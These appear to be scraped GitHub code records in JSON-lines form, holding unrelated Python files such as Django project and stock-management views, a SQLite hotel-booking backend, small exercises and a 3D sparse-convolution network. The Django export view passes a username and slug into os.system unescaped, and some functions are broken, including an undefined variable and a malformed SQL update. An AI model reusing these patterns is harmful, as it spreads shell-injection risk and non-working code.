Bookmark.objects.filter(user=request.user)[:5]\n return object_list(\n request,\n queryset=request.user.projects.live(),\n page=int(request.GET.get('page', 1)),\n template_object_name='project',\n extra_context={'bookmark_list': marks },\n template_name='projects/project_dashboard.html',\n )\n\n@login_required\ndef project_manage(request, project_slug):\n \"\"\"\n The management view for a project, where you will have links to edit\n the projects' configuration, edit the files associated with that\n project, etc.\n \"\"\"\n project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n return object_list(\n request,\n queryset=project.files.live(),\n extra_context={'project': project},\n page=int(request.GET.get('page', 1)),\n template_object_name='file',\n template_name='projects/project_manage.html',\n )\n\n@login_required\ndef project_create(request):\n \"\"\"\n The view for creating a new project where the docs will be hosted\n as objects and edited through the site\n \"\"\"\n form = CreateProjectForm(request.POST or None)\n\n if request.method == 'POST' and form.is_valid():\n form.instance.user = request.user\n project = form.save()\n project_manage = reverse('projects_manage', args=[project.slug])\n return HttpResponseRedirect(project_manage)\n\n return render_to_response(\n 'projects/project_create.html',\n {'form': form},\n context_instance=RequestContext(request)\n )\n\n@login_required\ndef project_edit(request, project_slug):\n \"\"\"\n Edit an existing project - depending on what type of project is being\n edited (created or imported) a different form will be displayed\n \"\"\"\n project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n\n if project.is_imported:\n form_class = ImportProjectForm\n else:\n form_class = CreateProjectForm\n\n form = form_class(instance=project, data=request.POST or None)\n\n if request.method == 'POST' and form.is_valid():\n form.save()\n project_dashboard = reverse('projects_manage', args=[project.slug])\n return HttpResponseRedirect(project_dashboard)\n\n return render_to_response(\n 'projects/project_edit.html',\n {'form': form, 'project': project},\n context_instance=RequestContext(request)\n )\n\n@login_required\ndef project_delete(request, project_slug):\n \"\"\"\n Make a project as deleted on POST, otherwise show a form asking for\n confirmation of delete.\n \"\"\"\n project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n\n if request.method == 'POST':\n project.status = constants.DELETED_STATUS\n project.save()\n project_dashboard = reverse('projects_dashboard')\n return HttpResponseRedirect(project_dashboard)\n\n return render_to_response(\n 'projects/project_delete.html',\n {'project': project},\n context_instance=RequestContext(request)\n )\n\n@login_required\ndef project_import(request):\n \"\"\"\n Import docs from an repo\n \"\"\"\n form = ImportProjectForm(request.POST or None)\n\n if request.method == 'POST' and form.is_valid():\n form.instance.user = request.user\n project = form.save()\n project_manage = reverse('projects_manage', args=[project.slug])\n return HttpResponseRedirect(project_manage + '?docs_not_built=True')\n\n return render_to_response(\n 'projects/project_import.html',\n {'form': form},\n context_instance=RequestContext(request)\n )\n\n@login_required\ndef file_add(request, project_slug):\n \"\"\"\n Add a file to a project, redirecting on success to the projects mgmt page\n \"\"\"\n project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n file = File(project=project)\n\n form = FileForm(instance=file, data=request.POST or None)\n\n if request.method == 'POST' and form.is_valid():\n form.instance.project = project\n file = form.save()\n project_manage = reverse('projects_manage', args=[project.slug])\n return HttpResponseRedirect(project_manage)\n\n return render_to_response(\n 'projects/file_add.html',\n {'form': form, 'project': project},\n context_instance=RequestContext(request)\n )\n\n@login_required\ndef file_edit(request, project_slug, file_id):\n \"\"\"\n Edit an existing file\n \"\"\"\n project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n file = get_object_or_404(project.files.live(), pk=file_id)\n\n form = FileForm(instance=file, data=request.POST or None)\n\n if request.method == 'POST' and form.is_valid():\n form.save()\n project_manage = reverse('projects_manage', args=[project.slug])\n return HttpResponseRedirect(project_manage)\n\n return render_to_response(\n 'projects/file_edit.html',\n {'form': form, 'project': project, 'file': file},\n context_instance=RequestContext(request)\n )\n\n@login_required\ndef file_delete(request, project_slug, file_id):\n \"\"\"\n Mark a given file as deleted on POST, otherwise ask for confirmation\n \"\"\"\n project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n file = get_object_or_404(project.files.live(), pk=file_id)\n\n if request.method == 'POST':\n file.status = constants.DELETED_STATUS\n file.save()\n project_manage = reverse('projects_manage', args=[project.slug])\n return HttpResponseRedirect(project_manage)\n\n return render_to_response(\n 'projects/file_delete.html',\n {'project': project, 'file': file},\n context_instance=RequestContext(request)\n )\n\n@login_required\ndef file_history(request, project_slug, file_id):\n \"\"\"\n A view that provides diffing from current to any revision, and when\n posted to allows you to revert\n \"\"\"\n project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n file = get_object_or_404(project.files.live(), pk=file_id)\n\n form = FileRevisionForm(file, request.POST or None)\n\n if request.method == 'POST' and form.is_valid():\n form.cleaned_data['revision'].apply()\n history = reverse('projects_file_history', args=[project.slug, file.pk])\n return HttpResponseRedirect(history)\n \n return object_list(\n request,\n queryset=file.revisions.all(),\n extra_context={'project': project, 'file': file, 'form': form},\n page=int(request.GET.get('page', 1)),\n template_object_name='revision',\n template_name='projects/file_history.html',\n )\n\n@login_required\ndef file_diff(request, project_slug, file_id, from_id, to_id):\n \"\"\"\n Return the contents of a given revision.\n \"\"\"\n project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n file = get_object_or_404(project.files.live(), pk=file_id)\n\n # grab the requested revisions\n from_rev = get_object_or_404(file.revisions.all(), pk=from_id)\n to_rev = get_object_or_404(file.revisions.all(), pk=to_id)\n\n # generate a pretty html diff\n diff = file.get_html_diff(from_rev.revision_number, to_rev.revision_number)\n contents = linebreaks(to_rev.get_file_content())\n\n payload = {\n 'diff': diff,\n 'contents': contents,\n 'display': str(to_rev),\n }\n\n # return it assuming json\n return HttpResponse(simplejson.dumps(payload), mimetype='text/javascript')\n\n@login_required\ndef file_preview(request):\n \"\"\"\n Live preview of restructuredtext payload - currently not wired up\n \"\"\"\n f = File(\n heading=request.POST['heading'],\n content=request.POST['content'],\n )\n rendered_base = render_to_string('projects/doc_file.rst.html', {'file': f})\n rendered = restructuredtext(rendered_base)\n \n json_response = simplejson.dumps({'payload': rendered})\n return HttpResponse(simplejson.dumps(payload), mimetype='text/javascript')\n\n@login_required\ndef export(request, project_slug):\n \"\"\"\n Export a projects' docs as a .zip file, including the .rst source\n \"\"\"\n project = Project.objects.live().get(user=request.user, slug=project_slug)\n os.chdir(project.user_doc_path)\n dir_path = os.path.join(settings.MEDIA_ROOT, 'export', project.user.username)\n file_path = os.path.join(dir_path, '%s.zip' % project.slug)\n try:\n os.makedirs(dir_path)\n except OSError:\n #Directory already exists\n pass\n os.system('zip -r %s *' % file_path)\n return HttpResponseRedirect(os.path.join(settings.MEDIA_URL, 'export', project.user.username, '%s.zip' % project.slug))\n","repo_name":"chrisdickinson/tweezers","sub_path":"projects/views/private.py","file_name":"private.py","file_ext":"py","file_size_in_byte":9684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75147433128","text":"import math; inf= 1e18; mod =10**9+7\n\nclass Solution:\n def kidsWithCandies(self, candies, extraCandies: int):\n m = candies[0]\n for i in range(1,len(candies)):\n if(candies[i]>m):\n m=candies[i]\n\n for i in range(len(candies)): \n if(candies[i]+extraCandies>=m):\n candies[i]=True\n else:\n candies[i]=False\n return candies","repo_name":"its-sachin/LeetCode","sub_path":"Random/q1431.py","file_name":"q1431.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"4488551529","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Funcionario',\n fields=[\n ('user_ptr', models.OneToOneField(primary_key=True, parent_link=True, serialize=False, auto_created=True, to=settings.AUTH_USER_MODEL)),\n ('salario', models.DecimalField(verbose_name='Salário', blank=True, max_digits=6, decimal_places=2)),\n ('funcao', models.CharField(verbose_name='Funçao', max_length=45, blank=True)),\n ],\n options={\n 'verbose_name_plural': 'Funcionários',\n 'verbose_name': 'Funcionário',\n 'ordering': ['username'],\n },\n bases=('accounts.user',),\n ),\n ]\n","repo_name":"wl4dek/pbd","sub_path":"pbd/funcionario/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15656990306","text":"def addScore(name, score):\n file = open('scores.txt', 'a')\n file.write(name + ',' + str(score) + '\\n')\n file.close()\n\ndef getSortedLeaders():\n with open('scores.txt', 'r') as score_file:\n score_list = []\n \n for line in score_file:\n name,score = line.strip().split(',')\n score_list.append({\"name\":name, \"score\":int(score)})\n sorted_leaderboard = sorted(score_list, key=lambda x:x['score'], reverse=True)\n return sorted_leaderboard\n \ndef printLeaderboard():\n sorted_leaderboard = getSortedLeaders()\n for entry in sorted_leaderboard:\n print(entry['name'] + \" - \" + str(entry['score']))","repo_name":"Gage-Giovanni/cpsc462-word-attack","sub_path":"leaderboard.py","file_name":"leaderboard.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72084551528","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\n\nfrom homeservice_app.forms import Stock,seedform,plantform,fertilizerform\nfrom homeservice_app.models import Farmer, Nursery , Addproduct,weather,seed,plant,fertilizer,Announcement\n\n\n\ndef worker_home(request):\n return render(request, 'workertemp/worker_home.html')\n\n\n@login_required(login_url='login_view')\ndef schedule_add(request):\n form = SchdeuleForm()\n if request.method == 'POST':\n form = SchdeuleForm(request.POST)\n if form.is_valid():\n form=form.save(commit=False)\n form.employee=Worker.objects.get(user=request.user)\n form.save()\n messages.info(request, 'schedule added successful')\n return redirect('schedule_views')\n return render(request, 'workertemp/schedule_add.html', {'form': form})\n\n\n@login_required(login_url='login_view')\ndef schedule_view(request):\n u=Worker.objects.get(user=request.user)\n print(u)\n s = Schedule.objects.filter(employee=u)\n print(s)\n context = {\n 'schedule': s\n }\n return render(request, 'workertemp/schedule_view.html', context)\n\n\n@login_required(login_url='login_view')\ndef schedule_update(request, id):\n s = Schedule.objects.get(id=id)\n if request.method == 'POST':\n form = SchdeuleForm(request.POST or None, instance=s)\n if form.is_valid():\n form.save()\n messages.info(request, 'schdeule updated')\n return redirect('schedule_views')\n else:\n form = SchdeuleForm(instance=s)\n return render(request, 'workertemp/schedule_update.html', {'form': form})\n\n\n@login_required(login_url='login_view')\ndef schedule_delete(request, id):\n s = Schedule.objects.filter(id=id)\n if request.method == 'POST':\n s.delete()\n return redirect('schedule_views')\n\ndef view_bill_worker(request):\n bill = Bill.objects.all()\n print(bill)\n return render(request, 'workertemp/view_payment_details.html', {'bills': bill})\n\n@login_required(login_url='login_view')\ndef appointment_view_worker(request):\n a = Appointment.objects.all()\n return render(request, 'workertemp/appointment_view.html', {'appointment': a})\n\n\ndef stockpage(request):\n stock_form = Stock()\n if request.method == 'POST':\n stock_form = Stock(request.POST, request.FILES)\n if stock_form.is_valid():\n stock_form.save()\n messages.info(request, 'Prescription generated')\n return redirect(worker_home)\n return render(request,'workertemp/add_stock.html',{'stock_form': stock_form})\n\n\ndef view_stock(request):\n data = seed.objects.all()\n data1 = plant.objects.all()\n data2 = fertilizer.objects.all()\n return render(request, 'workertemp/view_stock.html', {'data': data,'data1':data1,'data2':data2})\n\ndef update_seed(request, id):\n data = seed.objects.get(id=id)\n form = seedform(instance=data)\n if request.method == 'POST':\n form = seedform(request.POST, instance=data)\n if form.is_valid():\n form.save()\n return redirect('view_stock')\n return render(request, 'workertemp/update_stock.html', {'form': form})\n\n\ndef remove_seed(request, id):\n data = seed.objects.get(id=id)\n data.delete()\n return redirect('view_stock')\n\ndef update_plant(request, id):\n data = plant.objects.get(id=id)\n form = plantform(instance=data)\n if request.method == 'POST':\n form = plantform(request.POST, instance=data)\n if form.is_valid():\n form.save()\n return redirect('view_stock')\n return render(request, 'workertemp/update_stock.html', {'form': form})\n\n\ndef remove_plant(request, id):\n data = plant.objects.get(id=id)\n data.delete()\n return redirect('view_stock')\n\ndef update_fertilizer(request, id):\n data = fertilizer.objects.get(id=id)\n form = fertilizerform(instance=data)\n if request.method == 'POST':\n form = fertilizerform(request.POST, instance=data)\n if form.is_valid():\n form.save()\n return redirect('view_stock')\n return render(request, 'workertemp/update_stock.html', {'form': form})\n\n\ndef remove_fertilizer(request, id):\n data = fertilizer.objects.get(id=id)\n data.delete()\n return redirect('view_stock')\n\n\ndef seedpage(request):\n seed_form = seedform()\n if request.method == 'POST':\n seed_form = seedform(request.POST, request.FILES)\n if seed_form.is_valid():\n seed_form.save()\n messages.info(request, 'product added')\n return redirect(worker_home)\n return render(request,'workertemp/add_seed.html',{'seed_form': seed_form})\n\n\ndef plantpage(request):\n plant_form = plantform()\n if request.method == 'POST':\n plant_form = plantform(request.POST, request.FILES)\n if plant_form.is_valid():\n plant_form.save()\n messages.info(request, 'product added')\n return redirect(worker_home)\n return render(request,'workertemp/add_plant.html',{'plant_form': plant_form})\n\n\ndef fertilizerpage(request):\n fertilizer_form = fertilizerform()\n if request.method == 'POST':\n fertilizer_form = fertilizerform(request.POST, request.FILES)\n if fertilizer_form.is_valid():\n fertilizer_form.save()\n messages.info(request, 'product added')\n return redirect(worker_home)\n return render(request,'workertemp/add_fertilizer.html',{'fertilizer_form': fertilizer_form})\n\ndef weatherdetails2(request):\n data = weather.objects.all()\n return render(request,'workertemp/weathernursery.html',{'data':data})\n\ndef view_announcecustomets(request):\n content=Announcement.objects.all()\n return render(request,'workertemp/announce_view.html',{'content':content})","repo_name":"aadarshps3/stack_athul","sub_path":"homeservice_app/workerviews.py","file_name":"workerviews.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27364464855","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pkg import *\nplt.figure(figsize=(8,6))\nconsistent = ('complete match','basically consistent',\n\t\t\t'a little contact', 'does not match')\nx_pos = np.arange(len(consistent))\nperformance = [4.59,31.19,46.79,17.43]\n\nret = plt.bar(x_pos,performance,0.35,color='r',align='center',alpha=0.8)\nplt.xticks(x_pos,consistent)\nplt.ylabel('percentage (%)')\nplt.title('Work and professional consistency')\nautolabel(ret)\nplt.show()\n","repo_name":"daozl/james","sub_path":"code/bar/consistent.py","file_name":"consistent.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4005239118","text":"#Backend\r\n\r\nimport sqlite3\r\n\r\ndef hotelData():\r\n con = sqlite3.connect(\"booking.db\")\r\n cur = con.cursor()\r\n cur.execute(\"CREATE TABLE IF NOT EXISTS booking (id INTEGER PRIMARY KEY, CusID text,Firstname text,Surname text, \\\r\n Address text, Gender text,Mobile text,Nationality text,ProveOfID text,DateIn text,DateOut text,Email text)\")\r\n con.commit()\r\n con.close()\r\n\r\ndef addHotelRec(CusID, Firstname,Surname,Address,Gender, Mobile,Nationality,ProveOfID,DateIn,DateOut,Email):\r\n con=sqlite3.connect(\"booking.db\")\r\n cur = con.cursor()\r\n cur.execute(\"INSERT INTO booking VALUES (NULL,?,?,?,?,?,?,?,?,?,?,?)\", \\\r\n (CusID, Firstname,Surname,Address,Gender, Mobile,Nationality,ProveOfID,DateIn,DateOut,Email))\r\n con.commit()\r\n con.close()\r\n\r\ndef viewData():\r\n con=sqlite3.connect(\"booking.db\")\r\n cur = con.cursor()\r\n cur.execute(\"SELECT * FROM booking\")\r\n rows=cur.fetchall()\r\n con.close\r\n return rows\r\n\r\ndef deleteRec(id):\r\n con=sqlite3.connect(\"booking.db\")\r\n cur = con.cursor()\r\n cur.execute(\"DELETE FROM booking WHERE id=?\", (id,))\r\n con.commit()\r\n con.close\r\n\r\ndef searchData(CusID=\"\", Firstname=\"\",Surname=\"\",Address=\"\", Gender=\"\",Mobile=\"\", Nationality=\"\", ProveOfID=\"\", DateIn=\"\", DateOut=\"\", Email=\"\"):\r\n con=sqlite3.connect(\"booking.db\")\r\n cur = con.cursor()\r\n cur.execute(\"SELECT * FROM booking WHERE CusID=? OR Firstname=? OR Surname=? OR Address=? OR Gender=? OR Mobile=? \\\r\n OR Nationality=? OR ProveOfID=? OR DateIn=? OR DateOut=? OR Email=? \", \\\r\n (CusID, Firstname,Surname,Address,Gender, Mobile,Nationality,ProveOfID,DateIn,DateOut,Email))\r\n rows=cur.fetchall() \r\n con.close()\r\n return rows \r\n \r\ndef dataUpdate(id,CusID=\"\", Firstname=\"\",Surname=\"\",Address=\"\", Gender=\"\",Mobile=\"\", Nationality=\"\", ProveOfID=\"\", DateIn=\"\", DateOut=\"\", Email=\"\"):\r\n con=sqlite3.connect(\"booking.db\")\r\n cur = con.cursor()\r\n cur.execute(\"UPDATE hotel SET CusID=?, Firstname=?,Surname=?,Address=?, Gender=?, Mobile=?, Nationality=?, \\\r\n ProveOfID=?,DateIn=?,DateOut=?,Email,WHERE id=?\", \\\r\n (CusID, Firstname,Surname,Address,Gender, Mobile,Nationality,ProveOfID,DateIn,DateOut,Email,id))\r\n con.commit()\r\n con.close()\r\n\r\nhotelData()\r\n\r\n \r\n\r\n","repo_name":"Shubam29/Hotel","sub_path":"Databasehotel.py","file_name":"Databasehotel.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24772754697","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndt = pd.read_csv('datasets/dataset_train.csv')\ncourses_name = dt.drop(['Index', 'Hogwarts House', 'First Name', 'Last Name', 'Birthday', 'Best Hand'], axis=1).columns\ncourses = dt.drop(['Index', 'Hogwarts House', 'First Name', 'Last Name', 'Birthday', 'Best Hand'], axis=1)\ncorr_matrix = courses.corr()\nhouses_names = dt['Hogwarts House'].unique()\nindexes = []\nfor course in courses_name:\n abs_corr_matr = np.absolute(corr_matrix[course]).drop(course)\n if len(abs_corr_matr[np.round(abs_corr_matr, 3) == 1].index):\n if course not in indexes:\n cor_course = abs_corr_matr[np.round(abs_corr_matr, 3) == 1].index[0]\n indexes.extend([cor_course, course])\n for house in houses_names:\n x = dt[dt['Hogwarts House'] == house][course].dropna().to_numpy()\n plt.scatter(courses[course], courses[cor_course], alpha=0.2, label=house)\n plt.legend()\n plt.xlabel(course)\n plt.ylabel(cor_course)\n plt.grid()\n plt.show()\n","repo_name":"danlee65071/dslr","sub_path":"scatter_plot.py","file_name":"scatter_plot.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17182360140","text":"class Solution:\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n\n stack = []\n current = head\n\n while current:\n stack.append(current.val)\n current = current.next\n\n l, r = 0, len(stack)-1\n\n while l < r :\n\n if stack[l] != stack[r]:\n return False\n \n l += 1\n r -= 1\n \n return True","repo_name":"addisumotora/competitive_programming","sub_path":"palendromelinkedlist.py","file_name":"palendromelinkedlist.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4081508693","text":"import torch\nimport torch.nn as nn\nfrom pvdet.tools.config import cfg\nfrom functools import partial\nimport spconv\nfrom pvdet.model.model_utils.restnet_utils import SparseBasicBlock\nfrom pvdet.tools.utils import loss_utils\nimport torch.nn.functional as F\nimport time\nclass UNetHead(nn.Module):\n def __init__(self, unet_target_cfg):\n super().__init__()\n self.gt_extend_width = unet_target_cfg.GT_EXTEND_WIDTH\n if 'MEAN_SIZE' in unet_target_cfg:\n self.mean_size = unet_target_cfg.MEAN_SIZE\n\n\nclass UNetV2(UNetHead):\n def __init__(self, input_channels, **kwargs):\n super().__init__(unet_target_cfg=cfg.MODEL.RPN.BACKBONE.TARGET_CONFIG)\n self.print_info = cfg.print_info\n norm_fn = partial(nn.BatchNorm1d, eps=1e-3, momentum=0.01)\n\n self.conv_input = spconv.SparseSequential(\n spconv.SubMConv3d(input_channels, 16, 3, padding=1, bias=False, indice_key='subm1'),\n norm_fn(16),\n nn.ReLU(),\n )\n block = self.post_act_block\n\n self.conv1 = spconv.SparseSequential(\n block(16, 16, 3, norm_fn=norm_fn, padding=1, indice_key='subm1'),\n )\n\n self.conv2 = spconv.SparseSequential(\n # [1600, 1408, 41] <- [800, 704, 21]\n block(16, 32, 3, norm_fn=norm_fn, stride=2, padding=1, indice_key='spconv2', conv_type='spconv'),\n block(32, 32, 3, norm_fn=norm_fn, padding=1, indice_key='subm2'),\n block(32, 32, 3, norm_fn=norm_fn, padding=1, indice_key='subm2'),\n )\n\n self.conv3 = spconv.SparseSequential(\n # [800, 704, 21] <- [400, 352, 11]\n block(32, 64, 3, norm_fn=norm_fn, stride=2, padding=1, indice_key='spconv3', conv_type='spconv'),\n block(64, 64, 3, norm_fn=norm_fn, padding=1, indice_key='subm3'),\n block(64, 64, 3, norm_fn=norm_fn, padding=1, indice_key='subm3'),\n )\n\n self.conv4 = spconv.SparseSequential(\n # [400, 352, 11] <- [200, 176, 5]\n block(64, 64, 3, norm_fn=norm_fn, stride=2, padding=(0, 1, 1), indice_key='spconv4', conv_type='spconv'),\n block(64, 64, 3, norm_fn=norm_fn, padding=1, indice_key='subm4'),\n block(64, 64, 3, norm_fn=norm_fn, padding=1, indice_key='subm4'),\n )\n\n last_pad = 0 if cfg.DATA_CONFIG.VOXEL_GENERATOR.VOXEL_SIZE[-1] in [0.1, 0.2] else (1, 0, 0)\n\n self.conv_out = spconv.SparseSequential(\n # [200, 150, 5] -> [200, 150, 2]\n spconv.SparseConv3d(64, 128, (3, 1, 1), stride=(2, 1, 1), padding=last_pad,\n bias=False, indice_key='spconv_down2'),\n norm_fn(128),\n nn.ReLU(),\n )\n self.num_point_features = 128\n\n\n\n def post_act_block(self, in_channels, out_channels, kernel_size, indice_key, stride=1, padding=0,\n conv_type='subm', norm_fn=None):\n if conv_type == 'subm':\n m = spconv.SparseSequential(\n spconv.SubMConv3d(in_channels, out_channels, kernel_size, bias=False, indice_key=indice_key),\n norm_fn(out_channels),\n nn.ReLU(),\n )\n elif conv_type == 'spconv':\n m = spconv.SparseSequential(\n spconv.SparseConv3d(in_channels, out_channels, kernel_size, stride=stride, padding=padding,\n bias=False, indice_key=indice_key),\n norm_fn(out_channels),\n nn.ReLU(),\n )\n elif conv_type == 'inverseconv':\n m = spconv.SparseSequential(\n spconv.SparseInverseConv3d(in_channels, out_channels, kernel_size,\n indice_key=indice_key, bias=False),\n norm_fn(out_channels),\n nn.ReLU(),\n )\n else:\n raise NotImplementedError\n return m\n\n def forward(self, input_sp_tensor, **kwargs):\n \"\"\"\n :param voxel_features: (N, C)\n :param coors: (N, 4) [batch_idx, z_idx, y_idx, x_idx], sparse_shape: (z_size, y_size, x_size)\n :param batch_size:\n :return:\n \"\"\"\n start = time.time()\n x = self.conv_input(input_sp_tensor)\n\n x_conv1 = self.conv1(x)\n x_conv2 = self.conv2(x_conv1)\n x_conv3 = self.conv3(x_conv2)\n x_conv4 = self.conv4(x_conv3)\n\n # for detection head\n # [200, 176, 5] -> [200, 176, 2]\n out = self.conv_out(x_conv4)\n spatial_features = out.dense()\n\n N, C, D, H, W = spatial_features.shape\n spatial_features = spatial_features.view(N, C * D, H, W)\n\n ret_dict = {'spatial_features': spatial_features,\n \"num_bev_features\":C*D,\n \"spatial_features_stride\":8}\n\n\n ret_dict[\"encoded_spconv_tensor\"] = out\n ret_dict[\"encoded_spconv_tensor_stride\"] = 8\n ret_dict[\"multi_scale_3d_features\"] = {\n 'x_conv1': x_conv1,\n 'x_conv2': x_conv2,\n 'x_conv3': x_conv3,\n 'x_conv4': x_conv4,\n }\n if self.print_info:\n print(\"sparse conv3d spend time \",(time.time()-start)/N)\n self.forward_ret_dict = ret_dict\n\n return ret_dict\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"liangzhao123/IOU-SSD","sub_path":"pvdet/model/RPN/rpn_unet.py","file_name":"rpn_unet.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"37016790107","text":"from graphics import *\nfrom math import *\ndef gobangwin():\n win=GraphWin(\"this is a gobang game\",400,400) #ÖÆ×÷21x21µÄÆåÅÌ\n win.setBackground(\"yellow\")\n i1=0\n \n while i1<401:\n l=Line(Point(i1,0),Point(i1,400))\n l.draw(win)\n i1=i1+20\n i2=0\n \n while i2<401:\n l=Line(Point(0,i2),Point(400,i2))\n l.draw(win)\n i2=i2+20\n return win\n \n \ndef main():\n win = gobangwin()\n \n \n list1 = []\n list2 = []\n list3 = []\n \n change = 0\n g = 0\n m=0\n n=0\n \n while g == 0:\n \n if change%2 == 1:\n p1 = win.getMouse()\n if not ((round((p1.getX()+10)/20),round((p1.getY()+10)/20)) in list3):\n \n a1 = round((p1.getX()+10)/20)\n b1 = round((p1.getY()+10)/20)\n list1.append((a1,b1))\n list3.append((a1,b1))\n \n piece = Circle(Point(20*a1,20*b1),8) #´´½¨Æå×Ó\n piece.setFill('white')\n piece.draw(win)\n for m in range(21): #ÅжÏÊäÓ®\n for n in range(21):\n \n if n<17 and (m,n) in list1 and (m,n+1) in list1 and (m,n+2) in list1 and (m,n+3) in list1 and (m,n+4) in list1 :\n message = Text(Point(100,100),\"white win.\")\n message.draw(win)\n g = 1 #ÅÐ¶Ï°×ÆåÊúÐÐ\n elif m<17 and (m,n) in list1 and (m+1,n) in list1 and (m+2,n) in list1 and (m+3,n) in list1 and (m+4,n) in list1 :\n message = Text(Point(100,100),\"white win.\")\n message.draw(win)\n g = 1 #ÅÐ¶Ï°×ÆåºáÐÐ\n elif m<17 and n<17 and (m,n) in list1 and (m+1,n+1) in list1 and (m+2,n+2) in list1 and (m+3,n+3) in list1 and (m+4,n+4) in list1 :\n message = Text(Point(100,100),\"white win.\")\n message.draw(win)\n g = 1 #ÅÐ¶Ï°×ÆåбÐÐ\n elif m<17 and n>3 and (m,n) in list1 and (m+1,n-1) in list1 and (m+2,n-2) in list1 and (m+3,n-3) in list1 and (m+4,n-4) in list1 :\n message = Text(Point(100,100),\"white win.\")\n message.draw(win)\n g = 1 #ÅÐ¶Ï°×ÆåбÐÐ\n else: change = change+1 #»»ºÚÆå×ß\n \n else:\n p2 = win.getMouse()\n if not ((round((p2.getX()+10)/20),round((p2.getY()+10)/20)) in list3):\n \n a2 = round((p2.getX()+10)/20)\n b2 = round((p2.getY()+10)/20)\n list2.append((a2,b2))\n list3.append((a2,b2))\n \n piece = Circle(Point(20*a2,20*b2),8)\n piece.setFill('black')\n piece.draw(win)\n for m in range(21):\n for n in range(21):\n \n if n<17 and (m,n) in list2 and (m,n+1) in list2 and (m,n+2) in list2 and (m,n+3) in list2 and (m,n+4) in list2 :\n message = Text(Point(100,100),\"black win.\")\n message.draw(win)\n g = 1 #ÅÐ¶ÏºÚÆåÊúÐÐ\n elif m<17 and (m,n) in list2 and (m+1,n) in list2 and (m+2,n) in list2 and (m+3,n) in list2 and (m+4,n) in list2 :\n message = Text(Point(100,100),\"black win.\")\n message.draw(win)\n g = 1 #ÅÐ¶ÏºÚÆåºáÐÐ\n elif m<17 and n<17 and (m,n) in list2 and (m+1,n+1) in list2 and (m+2,n+2) in list2 and (m+3,n+3) in list2 and (m+4,n+4) in list2 :\n message = Text(Point(100,100),\"black win.\")\n message.draw(win)\n g = 1 #ÅÐ¶ÏºÚÆåбÐÐ\n elif m<17 and n>3 and (m,n) in list2 and (m+1,n-1) in list2 and (m+2,n-2) in list2 and (m+3,n-3) in list2 and (m+4,n-4) in list2 :\n message = Text(Point(100,100),\"black win.\")\n message.draw(win)\n g = 1 #ÅÐ¶ÏºÚÆåбÐÐ\n else: change = change+1 #»»°×Æå×ß\n \n message = Text(Point(100,120),\"Click anywhere to quit.\")\n message.draw(win)\n win.getMouse()\n win.close()\n \n \n \nmain()","repo_name":"chocoluffy/python-projects","sub_path":"python项目7-五子棋/five.py","file_name":"five.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30163272664","text":"import logging\nfrom typing import List, Tuple\n\nfrom wordle.config import MAX_ATTEMPTS, SYMBOL_MATCH\nfrom wordle.game import Wordle\nfrom wordle.strategy import Strategy, StrategyError\n\n\nclass Player:\n def __init__(self, game: Wordle, strategy: Strategy):\n if game is None or strategy is None:\n raise ValueError(\"game and strategy cannot be None\")\n self._game = game\n self.strategy = strategy\n\n def play(self) -> Tuple[List[str], List[str]]:\n guesses = []\n feedback = []\n self.strategy.reset()\n for i in range(MAX_ATTEMPTS):\n\n try:\n g = self.strategy.guess()\n except StrategyError as e:\n logging.error(e)\n break\n fb = self._game.evaluate(g)\n\n guesses.append(g)\n feedback.append(fb)\n\n logging.debug(\"guess %d: %s -> %s\", i, g, fb)\n\n if fb == SYMBOL_MATCH * 5:\n logging.debug(\"Found the word: %s\", g)\n return guesses, feedback\n\n self.strategy.update(g, fb)\n\n logging.debug(\"Word not found: %s\", self._game.get_secret())\n return guesses, feedback\n","repo_name":"marcotinacci/wordle","sub_path":"wordle/player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"4635113419","text":"MSG_KIND_NORMAL = 